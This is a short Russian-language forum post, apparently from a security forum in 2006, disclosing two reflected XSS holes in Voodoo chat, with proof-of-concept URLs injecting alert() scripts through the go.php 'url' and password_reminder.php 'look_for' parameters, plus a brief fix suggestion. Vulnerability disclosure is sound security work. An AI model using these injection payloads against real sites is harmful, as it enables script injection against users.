07.01.2006, 03:02
|
|
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
Провел на форуме:
4372175
Репутация:
1221
|
|
Есть пассивная хсс:
Type:[XSS] Product: Voodoo chat Author:qBiN exploit: http://victim.com/chat/go.php?url=javascript:alert(/Tested%20by%20qBiN/);
Решение: фильтровать переменную урл,можно даже проверять её на валидность с помощью сокетов. ------------------------------
Type:[XSS] Product: Voodoo chat Author:qBiN exploit: хттп://сите/chat/password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN test/);%3C/script%3E
вот смотри ету тему:
http://forum.antichat.ru/thread11144.html |
|
|